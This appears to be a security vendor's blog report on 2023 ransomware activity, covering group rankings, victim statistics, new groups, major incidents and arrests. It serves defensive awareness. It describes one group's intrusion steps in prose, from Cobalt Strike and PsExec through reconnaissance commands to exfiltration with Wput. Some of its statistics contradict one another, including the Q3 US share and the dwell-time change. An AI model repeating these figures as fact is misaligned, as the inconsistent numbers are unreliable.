2023 is considered the most successful year for ransomware groups in history.
In 2023, ransomware groups saw unprecedented success, with a 55.5% surge in victims, totaling 5,070 a stark rise from the previous year. Q2 and Q3 alone claimed more victims than the entire 2022, with 2903 victims. Ransomware leaders remain the veterans, LockBit3.0, ALPHV and Cl0p.
Without a doubt, the MOVEit campaign will be remembered as the most successful campaign this year, teaching us the importance of supply chain attacks, version control and the importance of understanding our attack surface. The USA was the most targeted country (49.8%, up from 38% in 2022) followed by the U.K. and Canada. The most targeted sector was business services, with 1265 cases, followed by retail and manufacturing.
See our 2024 trends report here.
Q4 2023 Ransomware Trends
In the fourth quarter of 2023, we documented 1,309 ransomware incidents globally. As illustrated in the graph below, the LockBit group continues to dominate ransomware group attacks, recording a total of 243 successful incidents. Following closely in second place is the PLAY group, which executed ransomware attacks on 110 different organizations. Notably, nearly 40% of their attacks were carried out in the fourth quarter alone.
It is worth mentioning that the CLOP gang did not make it to the top 10 list for the quarter despite being among the top 3 in the year’s overall totals. Since the notable MOVEIt breach orchestrated by the CLOP gang, there has been no observed activity from the group. However, despite missing an entire quarter, Cl0p is the third most active group in 2023, which shows us the scale of the MOVEit campaign.
In the year 2022, a total of 2,809 ransomware attacks were recorded globally. However, in 2023, there has been a significant surge, with the total number of ransomware attacks reaching 5070, marking a substantial increase of >55%.
This significant shift is spearheaded by established cybercrime groups like LockBit and Clop, with additional momentum coming from emerging ransomware gangs such as 8Base, BianLian, Play, Akira, and others. The substantial increase can be largely attributed to the CLOP group, which executed attacks at a higher frequency compared to the previous year, rapidly securing a position among the top three ransomware groups by attack count.
Targeted Countries in 2023
When examining the Top 10 Countries most impacted by ransomware attacks, notable shifts are not apparent. The United States maintains its leading position, accounting for approximately 49.8% of all ransomware attacks. Following a pattern similar to the previous year, the United Kingdom, Canada, France, and Germany secured the next positions in the Top 5, with a considerable gap from the United States.
In a noteworthy change, India has unfortunately entered the top 10, displacing Russia from the previous year. This change could be attributed to the ongoing conflict between Russia and Ukraine, which garnered significant attention last year and involved ransomware groups from both sides, resulting in an escalation of attacks on the Russian front. With a relative de-escalation in cyber warfare activities between the two nations this year, India has taken Russia’s side, experiencing increased ransomware attacks on its behalf.
Top Ransomware Families in 2023
Top 3 Ransomware Families
LockBit
Emerging in September 2019, the LockBit Ransomware Group claimed the title of the most active ransomware group in 2022 following the shutdown of Conti. Throughout 2023, LockBit maintained its prominence as the most active ransomware group. This year, LockBit achieved successful attacks on approximately 1047 victims, contributing to over 24% of the total ransomware attacks monitored by Cyberint in 2023.
On December 19, 2023, the FBI successfully dismantled one of the ALPHV/BlackCat ransomware sites. The main page now bears the customary FBI banner, while other sites linked to the cybercrime gang remain operational. Although the FBI’s action disrupted ALPHV, it is unlikely to completely halt the ransomware gang. Financially robust players like ALPHV can endure idle periods, and ransomware groups facing shutdown often resurface as entirely new entities or collaborate with existing groups. The comeback occurred swiftly when the group targeted two organizations at the end of December.
This year, ALPHV achieved successful attacks on approximately 445 victims, accounting for over 10% of the total ransomware attacks monitored by Cyberint in 2023.
Since February 2019, Clop attacks have been on the rise, persistently harming organizations worldwide in 2023. This year, Clop achieved successful attacks on approximately 384 victims, representing over 8% of the total ransomware attacks monitored by Cyberint in 2023.
Families Worth Noting in 2023
At the end of 2022, new ransomware families emerged and older ones intensified their attacks in 2023. Notable among them were the 8base and Play ransomware families.
8base
Initiating operations in April 2022, 8Base is a ransomware collective that swiftly gained a reputation for its forceful strategies and a substantial volume of victims despite its relatively short time in the cyber landscape. In 2023, the group achieved significant milestones, conducting attacks on 281 organizations, with 40% of their focus on the United States.
Play
First observed around June 2022, the Play ransomware gang, responsible for devastating attacks on major American cities, allegedly launched more than 300 successful incidents since June 2022. In this year alone, the group executed 304 attacks, with more than 50% targeting organizations in the United States.
Newcomers in 2023
Rhysida
The Rhysida ransomware group came into the spotlight around May-June 2023 when they introduced a victim support chat portal accessible through the TOR (.onion) site. The group portrays itself as a “cybersecurity team,” claiming to be acting in its victims’ best interests by targeting their systems and drawing attention to the purported security vulnerabilities and their potential consequences.
The Rhysida ransomware group has gained notoriety due to a series of attacks on healthcare institutions, prompting government agencies and cybersecurity firms to intensify scrutiny of the group’s activities. In June, Rhysida first garnered attention when it publicly disclosed documents stolen from the Chilean Army (Ejército de Chile) on its data leak site.
In 2023, the Rhysida ransomware group made headlines with multiple significant attacks. They targeted high-profile entities, including the British Library, where they conducted a cyber-attack, causing a major technology outage and selling stolen personal information online. In the US, Rhysida attacked Prospect Medical Holdings, impacting the healthcare sector, and compromised Insomniac Games, a Sony-owned video game developer, showcasing their broad reach across diverse industries.
Malaslocker
MalasLocker emerged in March 2023 and adopted an unconventional approach by promising a charitable donation in exchange for providing decryption tools and preventing data leaks. This departure from typical ransom demands casts them as digital activists against corporate entities and economic inequality. Despite their claims, it’s unclear if they follow through on decryption after receiving proof of donations.
Focusing primarily on the Business Services, Software, and Manufacturing sectors, with a significant emphasis on Professional, Scientific, and Technical Services, MalasLocker targets companies mainly located in Italy, Russia, and the United States. Their attacks involve breaching Zimbra servers, encrypting data, and uploading suspicious JSP files to specific directories.
Akira
Akira is offered as a ransomware-as-a-service and was discovered in March 2023. Preliminary research suggests a connection between the Akira group and threat actors associated with the notorious ransomware operation Conti.
This ransomware, identified as having an impact on both Windows and Linux systems, operates by exfiltrating and encrypting data, coercing victims into paying a twofold ransom to regain access and restore their files.
The collective responsible for this ransomware has already directed its attention towards numerous victims, primarily focusing on those in the U.S. Furthermore, the group operates an active leak site for the Akira ransomware, where they publish information, including their latest data breaches.
Blacksuit
BlackSuit, a newly identified ransomware group resembling the notorious Royal ransomware, has posed a significant threat to the Healthcare and Public Health (HPH) sector since its emergence in May 2023. Exhibiting strong connections to Royal and the now-defunct Conti, known for aggressive targeting in this sector, BlackSuit’s affiliation raises concerns. While their victim count is limited, their attacks have impacted the United States, Canada, Brazil, and the United Kingdom across industries like healthcare, manufacturing, business technology, retail, and government.
Notably, a U.S.-based medical services provider to numerous hospitals faced severe disruptions, reflecting potential widespread consequences. Employing a double extortion method, BlackSuit encrypts sensitive data and demands ransoms, with detections in various sectors, highlighting it’s evolving threat. Operating independently, BlackSuit’s distribution methods include infected email attachments, torrent websites, malicious ads, and Trojans.
3AM
3AM, a recently surfaced ransomware discovered in August 2023, has seen limited usage but showcased a noteworthy incident where it was employed as an alternative to LockBit after the latter was blocked. Coded in Rust, marking it as a distinct malware family, 3AM follows a distinct sequence, targeting services before encrypting files and attempting to delete Volume Shadow copies. The group behind 3AM publicly revealed leak sites, listing victims from the United States and Malaysia, a move that raises speculation about their intentions.
Notable Cyber Attacks & Campaigns in 2023
2023 provided us with some notable campaigns that, unfortunately, caused major damage to organizations worldwide. While MOVEit was the most devastating one, some other campaigns are worth mentioning.
MOVEit
The ongoing MOVEit campaign remains a prominent fixture in headlines, continually ensnaring new victims as it unfolds. This expansive campaign is a stark illustration of the potency of a supply chain attack, impacting many global companies. MOVEit, an instrumental managed file transfer (MFT) software employed widely across healthcare, finance, technology, and government sectors, touts its security through encryption and robust file transfer protocols for safe data exchange within and between teams and organizations.
However, within this seemingly secure software lie discovered vulnerabilities, exposing a path to remote code execution and potential data breaches. These loopholes have been exploited by the Cl0p ransomware group, tracing back to their exploitation of the MOVEit vulnerability since 2021, with evident attempts to extract data in 2022.
Cl0p, renowned for their adeptness at zero-day exploits such as the Accellion File Transfer Appliance (FTA) attacks in 2020 and 2021 and the targeting of GoAnywhere MFT servers in early 2023, has disclosed various compromised victims through the MOVEit flaw. Noteworthy companies like Norton, EY, and Zellis fell prey to this assault.
This extensive cyber incursion caused a ripple effect, impacting major entities to such an extent that the US government has offered a substantial reward for any information that links Cl0p’s actions to a foreign government.
Despite Cl0p’s claims of data deletion from specific sectors such as governments, the military, and children’s hospitals, their breach affected several US federal government agencies. The scale and repercussions of this attack continue to reverberate, with the Cl0p gang’s actions drawing widespread attention and scrutiny, signifying the severity and depth of the MOVEit ransomware breach.
Royal Ransomware Hits City of Dallas
The City of Dallas fell victim to a ransomware attack orchestrated by the Royal gang on May 3, triggering extensive network disruptions that compelled Dallas courts to remain shuttered until May 31. The Royal operators initially infiltrated the city’s network by pilfering service account credentials, maintaining a persistent presence for a month before deploying the ransomware. Restoration efforts commenced on May 9 and concluded by June 13.
In the wake of this disruptive attack, the Dallas City Council sanctioned an $8.5 million budget for mitigation and recovery endeavors. Expenditures encompassed external cybersecurity expertise, identity theft and fraud protection, and breach notification services.
The City of Dallas publicly acknowledged the ransomware intrusion in May, highlighted by the unusual printing of ransom notes from network printers, unequivocally attributed to the Royal ransomware group. In their blog post, the Royal ransomware gang threatened to expose sensitive information, encompassing employee details, court cases, prisoner data, medical records, client information, and governmental documents.
The ramifications were far-reaching, affecting various city services and departments, including the Dallas police department, 311 customer service app, courts, water utilities, code compliance services, animal services, secretary’s office, and development services. Subsequent reports from the Attorney General’s office in August indicated that 26,212 individuals bore the brunt of the breach, exposing personal details such as names, addresses, social security numbers, and medical and health insurance information. Further investigation pushed the tally of affected individuals to 30,253, amplifying the gravity and scope of the breach.
Las Vegas Hotel Giants Hit by Scattered Spider
In September 2023, two major hotel and casino giants in Las Vegas, MGM Resorts International and Caesars Entertainment, fell victim to ransomware attacks. MGM Resorts encountered a “cybersecurity issue” that led to the shutdown of U.S. systems, impacting numerous MGM hotels and disrupting vital services like the company’s website, app, reservations, ATMs, slot and credit card machines.
While sensitive financial data remained secure, personal information, including names, contact details, driver’s license and Social Security numbers, and passport details of pre-March 2019 customers were compromised, with a projected cost of around US$ 100 million. In contrast, Caesars Entertainment saw limited service disruption but suffered data theft from its loyalty program database, affecting 41,397 Maine residents.
Scattered Spider ransomware group claimed responsibility, absconding with 6 terabytes of data. MGM declined ransom payment, working on recovery, while reports indicated Caesars paid 15 US$ million of the demanded 30 US$ million ransom for data protection.
Black Cat Ransomware Hit Western Digital
In March, Western Digital encountered a ransomware attack linked to the ALPHV/BlackCat ransomware group, which they disclosed on April 3. Responding swiftly, they activated their protocols, restoring affected services and engaging law enforcement. The aftermath involved data theft and service disruptions affecting platforms like SanDisk and My Cloud, impacting customer access.
BlackCat, a notable ransomware group in 2023, claimed responsibility for leaking alleged stolen data publicly on April 28, employing aggressive tactics such as sharing purported footage from a Western Digital video conference. Western Digital acknowledged the leaked data on May 5 and confirmed an ongoing investigation into these claims.
LockBit Attack Royal Mail
In early 2023, Royal Mail experienced a significant ransomware attack orchestrated by the LockBit group. The attack, involving LockBit’s encryptors, severely disrupted Royal Mail’s international shipping capabilities for approximately six weeks. LockBit initially demanded a ransom of £65.7 million ($79.85 million) for the return of stolen data.
Royal Mail, however, chose not to comply with these ransom demands, which were considered “absurd” by its directors. In response, LockBit published 44 gigabytes of Royal Mail’s stolen data on the dark web in an attempt to extort money. Despite this pressure, Royal Mail maintained its stance against paying the ransom. The financial impact on Royal Mail was significant, with substantial costs incurred for recovery from the attack.
Meanwhile, LockBit continued its extortion attempts, reducing the ransom demand to £33 million, a decrease from the original £65 million. Royal Mail maintained its stance against paying the ransom. The company’s decision not to comply with the ransom demands led to LockBit publishing the stolen data on the dark web.
2023 Summary
2023 is a new all-time high for the ransomware industry. With permanent families such as LockBit ALPHV and Cl0p, this industry caused severe damage to organizations worldwide. In addition to that, the newcomers this year were introducing quality tools and products that helped them become permanent threats as well.
Although law authorities worldwide are still doing their best to stop this menace from continuing to evolve, the industry is still growing rapidly.
Read on for a detailed breakdown Quarter by Quarter ↓
Q3 2023 Ransomware Trends Summary
Q3 will be remembered as a new record for the ransomware industry as it was the most successful quarter ever recorded.
While the number skyrocketed in Q2 with 1386 cases, in Q3, the ransomware industry was able to surpass this number with 1420 cases.
With no surprise, the U.S. continues to be the most targeted country by ransomware, while the business services sector is the most targeted sector.
There is no doubt that the new faces that were introduced to the industry, along with the MOVEit campaign, were able to claim many victims. This, combined with the consistency of industry leader LockBit3.0, meant devastating results for companies worldwide.
Statistics
As mentioned, the ransomware industry claimed 1420 victims this quarter, the highest number of victims ever recorded in one quarter.
Top Ransomware Families in Q3 2023
While it was a successful quarter for the entire ransomware industry, three families were far ahead of the pack. As expected, LockBit3.0 remains the most dominant ransomware group with 252 new victims, 17.7% of all ransomware cases.
Coming second is Cl0p Ransomware, which was able to claim a significant number of victims − 177. An important note here is that although Cl0p claimed 177 victims, this was only in two out of the three months of the quarter, as they haven’t announced any victims for September.
Number three is the veteran group ALPHV with 120 victims this quarter.
Top Countries Targeted By Ransomware in Q3 2023
Regarding the most targeted countries (Figure 2), the U.S. remains the number one targeted country in the world, with good reason. The world’s leading economy, it was the victim of 51% of this quarter’s ransomware attacks − 575 cases.
The second most targeted country this quarter is the United Kingdom, with 77 cases, far behind the U.S. Finally, we have Canada in third place with 48 ransomware cases this quarter. Even when focusing on the top three countries, we can see that there is no doubt that the U.S. is the most attractive country to threat actors.
Top Sectors Targeted By Ransomware in Q3 2023
As expected, the business services sector was the most targeted sector in Q3, with 42% of the ransomware cases, followed by the manufacturing and the retail sectors, with 19% and 12%, respectively (Figure 3).
Newcomers to the Ransomware Industry in Q3 2023
RHYSIDA RANSOMWARE GROUP
The Rhysida ransomware group came into the spotlight around May-June 2023 when they introduced a victim support chat portal accessible through the TOR (.onion) site. The group portrays themselves as a “cybersecurity team” claiming to be acting in their victims’ best interests by targeting their systems and drawing attention to the purported security vulnerabilities and their potential consequences.
The Rhysida ransomware group has gained notoriety due to a series of attacks on healthcare institutions, prompting government agencies and cybersecurity firms to intensify their scrutiny of the group’s activities. Earlier in June, Rhysida first garnered attention when it publicly disclosed documents stolen from the Chilean Army (Ejército de Chile) on its data leak site.
Victimology of the Rhysida Ransomware Group
Rhysida ransomware mostly targets the U.S., with 31% of its victims. In addition, it also ran successful campaigns in the UK, Italy and France. As for the target sectors, it seems that Rhysida had the most success in the business services sector, which comprises 51% of their campaigns.
3AM: NEW RANSOMWARE FAMILY
A newly discovered ransomware strain named 3AM has emerged, but its usage has been limited thus far. One interesting attack that was discovered was when a ransomware affiliate tried to deploy LockBit on a target’s network but switched to 3AM when LockBit was blocked.
3AM is coded in Rust and appears to be an entirely new malware family. It follows a specific sequence: It attempts to halt multiple services on the compromised computer before initiating the file encryption process. After completing encryption, it tries to erase Volume Shadow (VSS) copies. Any potential links between its authors and known cybercrime organizations remain unclear.
The threat actor’s suspicious activities began with the utilization of the gpresult command to extract policy settings enforced on the computer for a specific user. They then executed various components of Cobalt Strike and made efforts to elevate privileges on the computer using PsExec.
Then the attackers conducted reconnaissance through commands such as whoami, netstat, quser, and net share. They also attempted to identify other servers for lateral movement using the quser and net view commands. In addition, they established a new user account to maintain persistence and employed the Wput tool to transfer the victims’ files to their FTP server.
On September 14, the 3AM (ThreeAM) Ransomware group made their leak sites public and included six organizations on their list of victims. These organizations consisted of five from the United States and one from Malaysia. It remains uncertain whether this development was an intentional publicity move or merely a coincidental occurrence for this group, which had only recently come to the researchers’ attention.
Arrests
US AND UK MOUNT AGGRESSIVE CRACKDOWN ON TRICKBOT AND CONTI GANGS
On September 7, the United States Department of Treasury and the United Kingdom Foreign Office jointly declared sanctions against 11 individuals, accusing them of being linked to the Trickbot cybercriminal group. Additionally, the US Department of Justice revealed indictments against nine individuals said to have ties to Trickbot and its affiliated entity, Conti. Notably, seven of the individuals named in the sanctions were also included in the list of those facing indictments.
The Department of Justice has unveiled three indictments, and among those charged is Galochkin. One of these indictments, filed on June 15 in the Northern District of Ohio, accuses him and ten other purported Trickbot members of conspiring to employ the Trickbot malware for personal gain, as well as personal and confidential data, from unsuspecting victims. These victims include businesses and financial institutions both within the United States and across the globe, with the illicit activity commencing in November 2015.
In an indictment filed in the Middle District of Tennessee, on June 12, Galochkin and three additional individuals were charged with using Conti ransomware. These charges stem from attacks aimed at “businesses, nonprofits, and governments in the United States” spanning from 2020 to June 2022.
Furthermore, an indictment filed in the Southern District of California on June 14 implicates Galochkin in connection with the Conti ransomware attack on Scripps Health that occurred on May 1, 2021.
IT WORKER JAILED FOR IMPERSONATING RANSOMWARE GANG TO EXTORT EMPLOYER
Ashley Liles, a 28-year-old former IT employee, has received a prison sentence of more than three years for his involvement in an extortion attempt against his employer during a ransomware attack.
Liles, who previously worked as an IT security analyst at a company based in Oxford, abused his position to intervene in a ransomware payment following an attack on his employer.
In an attempt to deceive the company, he posed as the ransomware group that was extorting them. His scheme involved trying to divert the ransom payments by changing the cybercriminals’ cryptocurrency wallet to one that he controlled.
He accessed the private emails of a board member on more than 300 occasions and also tampered with the original blackmail email, changing the payment destination specified by the initial attacker. Furthermore, he established an email address that closely resembled the one used by the attackers and used it to exert additional pressure on his employer, with the aim of ensuring that the ransomware gang’s demands would be met, and the ransom paid.
However, the company did not comply with the demands of the attackers. During this time, internal investigations revealed that Liles had been accessing confidential emails without authorization while using his home internet connection.
Although Liles took measures to erase all data from his personal devices once he became aware of the ongoing investigations, the cybercrime team from SEROCU seized his computer and successfully recovered damning evidence.
Initially, Liles vehemently denied any involvement, but during a recent court hearing at Reading Crown Court, he pleaded guilty, five years after the events in question.
As a result, Liles was sentenced to three years and seven months in prison for charges related to blackmail and unauthorized computer access with the intent to commit other offenses.
New Ransomware Trends in Q3 2023
LINUX VERSION OF ABYSS LOCKER RANSOMWARE TARGETS VMWARE ESXI SERVERS
Abyss Locker is a ransomware group that emerged relatively recently. Its activities are believed to have commenced in March 2023. Their modus operandi resembles that of other ransomware operations, involving the infiltration of corporate networks, data exfiltration for double extortion purposes, and the encryption of devices within the network.
The Abyss Locker campaign is the most recent example of the trend where ransomware operators have developed a Linux encryptor designed specifically to target VMware’s ESXi virtual machine platform in their attacks on businesses.
As organizations increasingly adopt virtual machines to enhance resource management, performance, and disaster recovery, ransomware groups have adapted by creating encryptors tailored to these platforms.
Given that VMware ESXi is among the most widely used virtual machine platforms, nearly every ransomware gang has started releasing Linux encryptors with the capability to encrypt all virtual servers hosted on these devices.
RANSOMWARE HACKERS’ DWELL TIME DROPS TO 5 DAYS, RDP STILL WIDELY USED
Ransomware threat actors are now spending less time operating within compromised networks before security solutions detect their presence. During the first half of this year, the median dwell time for hackers decreased from nine days in 2022 to just five days.
Upon cross-referencing our ransomware family statistics, encompassing all attacks monitored by Cyberint, with data provided by cybersecurity company Sophos, a noteworthy trend emerged. The median dwell time for cyberattacks, encompassing the entire spectrum of incidents, exhibited a decline from ten days in 2022 to a reduced eight-day timeframe during the first half of this year. Furthermore, it became evident that ransomware attacks accounted for approximately 70% of the total cyberattacks reported during this period.
From our findings and Sophos’ as well, we can indicate that while ransomware attackers act swiftly with a median dwell time reduction from 11 to 13 days this year, other cybercriminals conducting network intrusions tend to prolong their presence, waiting for the right moment.
Across all cases, the average dwell time hovers at 15-16 days, with the longest observed dwell time this year exceeding three months. Interestingly, data theft is becoming less common, as there were fewer such attacks, dropping to 31.58% in H1 2023 from 42.76% in 2022. This trend is supported by an uptick in incidents where it was confirmed that no data was exfiltrated, rising from 1.32% to 9.21%.
Our data reveals intriguing trends when examining the timing of cyberattacks. According to the stats, we suggest that threat actors, including ransomware groups, tend to target organizations more frequently on Tuesdays, Wednesdays, and Thursdays.
Major Ransomware Attacks & Incidents in Q3 2023
MOM’S MEALS DISCLOSES DATA BREACH IMPACTING 1.2 MILLION PEOPLE
PurFoods, operating under the name Mom’s Meals, reported a data breach in the Maine Attorney General’s Office. The breach involved the unauthorized access of sensitive information, including personal identifiers such as names, financial account numbers, payment card (credit or debit) details, security codes, and account passwords or PINs.
The company first detected “suspicious account behavior” on February 22, 2023. Subsequent investigation revealed that PurFoods had experienced a cyberattack between January 16, 2023, and February 22, 2023. During that attack, certain files on their network were encrypted. Although it couldn’t be definitively determined if data was extracted from their servers, the possibility couldn’t be ruled out.
PurFoods engaged third-party experts to conduct a review of the potentially compromised data, which concluded on July 10, 2023. This review revealed that the files in question contained personal and protected health information of specific individuals. The potentially exposed information included names, Social Security numbers, driver’s license or state identification numbers, financial account and payment card information, medical and health data, as well as birthdates.
The company initiated the notification process for affected individuals on August 25. According to official records, approximately 1,237,681 people may have been impacted by this security incident.
SRI LANKAN GOVERNMENT LOSES MONTHS OF DATA FOLLOWING RANSOMWARE ATTACK
In a recent cybersecurity incident, the Sri Lankan government suffered a significant data loss as a result of a ransomware attack. The attack targeted Sri Lanka’s government email network, impacting thousands of email accounts, including those belonging to high-ranking government officials. The attack, which commenced at the end of August, affected nearly 5,000 email addresses utilizing the gov[.]lk email domain, with the council of ministers, a central government body, among the victims.
The targeted system, known as the Lanka Government Cloud (LGC), was subjected to encryption, along with its backups. While officials managed to restore the LGC system within 12 hours of the attack, they were unable to recover backups from the period between May 17 and August 26. Consequently, all affected accounts lost data for that duration, as stated by Mahesh Perera, the head of Sri Lanka’s Information and Communication Technology Agency (ICTA).
In response to the incident, Sri Lanka’s computer emergency response team (CERT|CC) launched an investigation and is actively working on data recovery efforts. Perera has emphasized that the government has no intention of negotiating with the attackers or paying a ransom to retrieve the lost data.
The identity of the hacking group responsible for the attack remains unknown. It is suspected that the attackers may have gained access to the targeted system by distributing malicious links to government employees. It is likely that they exploited a vulnerability in an outdated version of Microsoft Exchange that had not been updated.
Notably, the Sri Lankan government has previously faced criticism for its lack of cybersecurity focus. The country lacked a dedicated cybersecurity authority until June 2023 when cybersecurity legislation was introduced.
CLOP GANG TO EARN OVER $75 MILLION FROM MOVEIT EXTORTION ATTACKS
Starting on May 27, the Clop ransomware group initiated extensive data theft attacks by exploiting a previously unknown vulnerability on the MOVEit Transfer secure file transfer platform.
These attacks are anticipated to have repercussions for numerous companies across the globe, with many of them having already informed their affected clientele over the course of the last two months. In addition, Clop has altered its approach to extortion by requesting considerably larger ransom payments than those typically observed in data exfiltration attacks. Their aim is to offset the overall decrease in payments by securing a few substantial sums.
Based on insights from various researchers, it’s anticipated that only a limited number of MOVEit data theft victims will opt to make payments. Despite this, Clop is still projected to accumulate a substantial sum, estimated to be in the range of $75-100 million, primarily due to the substantial ransom requests they’ve made.
The Ransomware Industry in 2023
The ransomware industry remains the number one threat to organizations worldwide. As this quarter had the most recorded victims, supply chain attacks became a solid technique for the mature and experienced ransomware groups.
In addition, this quarter revealed new ambitious groups that are looking to make their mark on the ransomware industry. LockBit3.0 remains the ruler of the industry, although Cl0p was not far behind this quarter.
Although we have seen increased activity by law authorities worldwide this quarter, this industry keeps on thriving despite these efforts.
With Cyberint’s Attack Surface Management, you gain visibility of your true attack surface – the digital assets you are aware of, the assets you are unaware of, and malicious or rogue assets. Learn more about how we prevent ransomware attacks with a 1:1 meeting.
